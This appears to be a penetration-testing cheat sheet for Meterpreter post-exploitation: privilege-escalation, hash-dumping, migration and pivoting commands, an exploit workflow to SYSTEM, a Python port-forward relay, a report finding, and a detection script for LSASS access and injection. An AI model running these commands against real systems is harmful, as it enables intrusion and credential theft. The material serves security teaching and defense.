🛡️ Methodology Checklist
- Get Meterpreter session
- Migrate to a stable process: migrate -N [PROCESS_NAME]
- Gather sysinfo: sysinfo; getuid; getpid
- Check and enable token privileges: getprivs
- Escalate to SYSTEM: getsystem (needs local admin or SeImpersonatePrivilege)
- Dump hashes: hashdump (requires SYSTEM)
- Pivot: run post/multi/manage/autoroute SUBNET=[NET]
- Background: background (or Ctrl+Z)
- Run post modules: run post/[MODULE]
🎯 Operational Context
Use when: Post-exploitation on a compromised host — Meterpreter provides encrypted C2, file operations, pivoting, credential dumping, and privilege escalation from a single session.
Think Dumber First: Run sysinfo and getuid immediately after getting a Meterpreter session. Then getsystem to attempt privilege escalation. If that fails, run local_exploit_suggester post module before manual enumeration.
Skip when: Target has EDR with Meterpreter signatures — use a custom C2 or shellcode injector instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| getuid | Show current user (whoami equivalent) |
| getprivs | Enable every privilege available to the current token and list the result |
| sysinfo | OS, hostname, architecture |
| getpid | Current process ID |
| ps | List all running processes |
| migrate [PID] | Move Meterpreter into another process |
| steal_token [PID] | Impersonate the security token of the target process (needs rights to open that process; SeDebugPrivilege for SYSTEM targets) |
| getsystem | Auto-escalate to NT AUTHORITY\SYSTEM via named-pipe impersonation or token duplication (needs local admin or SeImpersonatePrivilege) |
| hashdump | Dump NTLM hashes from SAM (requires SYSTEM) |
| lsa_dump_secrets | Dump LSA secrets (service accounts, default passwords); kiwi extension, run load kiwi first |
| lsa_dump_sam | Alternative SAM hash dump via the kiwi extension |
| ifconfig | Network interface information |
| netstat | Active network connections |
| portfwd add -l [LPORT] -p [TARGET_PORT] -r [TARGET_IP] | Forward a local attacker port to a port reachable from the victim |
| route add [INTERNAL_NET] [NETMASK] [SESSION_ID] | At the msf prompt, not the meterpreter prompt: route Metasploit module traffic for the subnet through the session |
| upload [FILE] | Upload file to target |
| download [FILE] | Download file from target |
| edit [FILE] | Edit file (vim-style) on target |
| cat [FILE] | Read file on target |
| shell | Drop into system CMD/Bash shell |
| background | Background session (returns to msf prompt) |
| exit | Terminate and close session |
| use post/multi/recon/local_exploit_suggester | At the msf prompt: list local privilege escalation exploits whose check passes on the session's host |
| set SESSION [ID]; run | Run post module against backgrounded session |
🔬 Deep Dive & Workflow
Architecture — What Makes Meterpreter Stealthy
- DLL Injection — loaded into an existing process via Reflective DLL injection; no new process spawned
- Runs in RAM — the Meterpreter DLL itself is never written to disk, which sidesteps file-based AV scans (the initial exploit or a dropped stager may still leave a file, such as the ASP uploaded in the workflow below)
- Encrypted channel — the TLV command stream is AES-encrypted (and wrapped in TLS for reverse_https), so a network IDS cannot read commands in transit; beaconing patterns and default handler certificates remain fingerprintable
- Extensible runtime — loads extensions (Mimikatz via load kiwi, VNC, etc.) over the wire without rebuilding the payload
Scan → SYSTEM Workflow
```
# 1. Enumerate with db_nmap
db_nmap -sV -p- [TARGET_IP]
# 2. Find and exploit a vulnerable service
search iis_webdav_upload_asp
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS [TARGET_IP]; set LHOST tun0
run
# → Meterpreter session 1
# 3. Check identity
meterpreter > getuid
# If low-privileged user:
# 4. Look for a SYSTEM process to steal a token from or migrate into
meterpreter > ps
# Note PID of services.exe, winlogon.exe, etc.
# 5a. Token stealing (only works if the current token can open the target
#     process, i.e. you are already local admin / hold SeDebugPrivilege;
#     from an unprivileged user it returns access denied: go to 5b)
meterpreter > steal_token [PID_OF_SYSTEM_PROC]
meterpreter > getuid
# → NT AUTHORITY\SYSTEM
# 5b. Local exploit suggester (if getsystem and token stealing fail)
meterpreter > bg
use post/multi/recon/local_exploit_suggester
set SESSION 1; run
# Note suggested exploits, then try one
use exploit/windows/local/ms15_051_client_copy_image
set SESSION 1; set LHOST tun0
run
# → New Meterpreter session as SYSTEM
# 6. Loot (lsa_dump_secrets is a kiwi command: load kiwi first)
meterpreter > hashdump
meterpreter > lsa_dump_secrets
```
Process Migration
migrate <PID> moves the Meterpreter DLL into a different process:
- Stability: if the exploited process is unstable (a web request handler, for example), migrate to a long-lived process such as explorer.exe or svchost.exe
- Privilege: if the target process runs as SYSTEM, migrating into it gives SYSTEM access, but opening a SYSTEM process needs rights you only hold as local admin (SeDebugPrivilege); an unprivileged user can only migrate into processes of the same user
- Stealth: moving from powershell.exe (noisy) to svchost.exe (expected system traffic); the migration itself (open process, write remote memory, create remote thread) is a well-known EDR detection, so migrate once, early, rather than repeatedly
Pivoting Commands
```
# Forward port — at the meterpreter prompt: reach an internal service through the victim
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.5.15
# Now RDP to 127.0.0.1:3389 → hits 172.16.5.15:3389 from the victim
# Route — at the msf prompt after backgrounding the session (the meterpreter-level
# route command edits the victim's own routing table instead): send Metasploit
# module traffic for the subnet through session 1
msf > route add 172.16.5.0 255.255.255.0 1
# Session 1 is now the gateway to 172.16.5.0/24 for auxiliary and exploit modules;
# run post/multi/manage/autoroute does the same from inside the session
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| getsystem fails | None of its techniques apply: all of them need local admin or SeImpersonatePrivilege | Run post/multi/recon/local_exploit_suggester and try the listed local exploits; if you are in the Administrators group but UAC-limited, run exploit/windows/local/bypassuac first |
| Meterpreter session dies after migrate | Target process crashed or could not be injected (protected or other-user process) | Migrate to a stable process owned by the same user: explorer.exe, svchost.exe, spoolsv.exe |
| hashdump returns access denied | Not SYSTEM (the SAM hive is readable only by SYSTEM) | Elevate first: getsystem; if that fails try bypassuac or token impersonation (steal_token on a SYSTEM process) |
| screenshot/webcam fails | Process not in the interactive desktop session | Migrate to a process in Session 1 (the user's desktop session): ps to find the explorer.exe PID |
| Meterpreter response slow or dropping | High latency or packet loss | Raise the dead-session tolerance on the payload: set SessionCommunicationTimeout 300 (seconds; this is not a poll interval); use reverse_https, which retries and reconnects, rather than reverse_tcp |
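What `portfwd add -l 3389 -p 3389 -r 172.16.5.15` from the Pivoting Commands section does is a bidirectional TCP relay: Meterpreter listens on the attacker's local port and makes the outbound connect to the target from inside the victim process. The following is an added example, not Metasploit code; it reimplements that relay in Python with both ends on localhost, so the "victim side" connect is a direct socket and only the relay logic is shown. The echo service, the port choice and the message are constructed for the demo.

```python
"""Added example (not Metasploit code): a bidirectional TCP relay that does what
`portfwd add -l LPORT -p TARGET_PORT -r TARGET_IP` does. Meterpreter listens on
LPORT on the attacker side and makes the outbound connect to TARGET_IP:TARGET_PORT
from inside the victim process; here both ends are local, so only the relay
logic is shown. The echo service and the message are constructed for the demo."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForward:
    """One `portfwd add` rule: 127.0.0.1:lport -> target_ip:target_port."""

    def __init__(self, lport: int, target_ip: str, target_port: int) -> None:
        self.target = (target_ip, target_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(("127.0.0.1", lport))
        self.listener.listen(5)
        self.lport = self.listener.getsockname()[1]  # real port when lport=0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:  # listener closed by close()
                return
            try:
                # In Meterpreter this connect runs on the victim, which is why
                # it can reach hosts that only the victim can see.
                upstream = socket.create_connection(self.target, timeout=5)
            except OSError:
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self) -> None:
        """Equivalent of `portfwd delete`: stop accepting new connections."""
        try:
            self.listener.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        self.listener.close()


def start_echo_service() -> int:
    """Constructed stand-in for the internal service (think RDP on 172.16.5.15)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip(lport: int, payload: bytes) -> bytes:
    """Connect to the forwarded local port, send payload, return the reply."""
    with socket.create_connection(("127.0.0.1", lport), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demo() -> bytes:
    """Forward a local port to the echo service and push one message through."""
    fwd = PortForward(lport=0, target_ip="127.0.0.1", target_port=start_echo_service())
    try:
        return roundtrip(fwd.lport, b"hello through the pivot")
    finally:
        fwd.close()


if __name__ == "__main__":
    print(demo())
```

The half-close in `_pump` is the part people get wrong when writing relays: each direction is shut down independently so an RDP or HTTP client that closes its write side still receives the server's remaining bytes, which is also why a single stuck direction in a real pivot shows up as a hung connection rather than an error.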
📝 Reporting Trigger
Finding Title: Meterpreter Session Provides Full Post-Exploitation Capability
Impact: An active Meterpreter session grants encrypted interactive access to the compromised system with credential dumping, pivoting, file system access, keylogging, and privilege escalation capabilities.
Root Cause: Initial vulnerability exploited with no EDR capable of detecting Meterpreter session establishment or post-exploitation module execution.
Recommendation: Deploy EDR with Meterpreter behavioral signatures (reflective injection, remote thread creation, LSASS handle access). Implement network egress filtering so reverse_tcp/reverse_https callbacks to arbitrary hosts fail. Alert on LSASS memory access from processes other than the expected system and security-agent images. Patch the exploited vulnerability immediately.
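The recommendation to alert on LSASS memory access from non-system processes, together with the process-injection step behind migrate, can be expressed as a handful of rules over endpoint telemetry. The block below is an added example written for this page, not code from the page or from Metasploit: it applies three detections to constructed records shaped like Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread). The allowlist, image paths, PIDs and sample events are assumptions for the demo and have to be tuned to a real estate.

```python
"""Added example, not code from the page or from Metasploit: detections for
"LSASS memory access from non-system processes" and for the injection step of
migrate, run over constructed records shaped like Sysmon Event ID 10
(ProcessAccess) and Event ID 8 (CreateRemoteThread). Allowlist, paths, PIDs
and sample events are assumptions for the demo."""
from typing import Dict, List

Event = Dict[str, object]

# Images that legitimately open LSASS with read rights (assumed; tune per estate).
LSASS_READERS = {
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\programdata\microsoft\windows defender\platform\msmpeng.exe",
}
# Win32 process access rights relevant to credential dumping and injection.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF


def _img(ev: Event, key: str) -> str:
    return str(ev.get(key, "")).lower()


def lsass_memory_read(ev: Event) -> bool:
    """Event 10: a non-allowlisted process obtained read access to LSASS memory,
    which is what hashdump/kiwi need to pull credentials."""
    if ev.get("EventID") != 10 or not _img(ev, "TargetImage").endswith(r"\lsass.exe"):
        return False
    if _img(ev, "SourceImage") in LSASS_READERS:
        return False
    granted = int(str(ev["GrantedAccess"]), 16)
    return granted == PROCESS_ALL_ACCESS or bool(granted & PROCESS_VM_READ)


def injection_handle(ev: Event) -> bool:
    """Event 10: a handle with write+thread rights on another process, the
    OpenProcess step of migrate (reflective DLL injection)."""
    if ev.get("EventID") != 10 or ev.get("SourceProcessId") == ev.get("TargetProcessId"):
        return False
    granted = int(str(ev["GrantedAccess"]), 16)
    needed = PROCESS_VM_WRITE | PROCESS_CREATE_THREAD
    return granted == PROCESS_ALL_ACCESS or (granted & needed) == needed


def unbacked_remote_thread(ev: Event) -> bool:
    """Event 8: a remote thread whose start address is not inside any loaded
    module (Sysmon leaves StartModule empty), typical of a reflectively loaded
    DLL. Injection that avoids CreateRemoteThread will not raise Event 8."""
    return ev.get("EventID") == 8 and not ev.get("StartModule")


RULES = [
    ("lsass_memory_read", lsass_memory_read),
    ("injection_handle", injection_handle),
    ("unbacked_remote_thread", unbacked_remote_thread),
]


def scan(events: List[Event]) -> List[str]:
    """Return 'rule:SourceImage->TargetImage' for every rule each event trips."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append(f"{name}:{ev['SourceImage']}->{ev['TargetImage']}")
    return hits


# Constructed sample telemetry (not real logs): a Meterpreter living in the
# exploited IIS worker reads LSASS, then migrates into svchost.exe.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "SourceProcessId": 912,
     "TargetImage": r"C:\Windows\System32\lsass.exe", "TargetProcessId": 688,
     "GrantedAccess": "0x1000"},  # QUERY_LIMITED_INFORMATION only: benign
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Windows\System32\lsass.exe", "TargetProcessId": 688,
     "GrantedAccess": "0x1010"},  # VM_READ|QUERY_INFORMATION: dump-style read
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Windows\System32\svchost.exe", "TargetProcessId": 1488,
     "GrantedAccess": "0x1FFFFF"},  # ALL_ACCESS on another process: migrate target opened
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Windows\System32\svchost.exe", "TargetProcessId": 1488,
     "StartAddress": "0x000001E4A2C40000", "StartModule": "", "StartFunction": ""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The first sample event is there to show the false-positive boundary: svchost.exe touching LSASS with 0x1000 is routine, and a rule that keyed only on the target image would page on it constantly. The access-mask check is what separates an inventory query from a memory read.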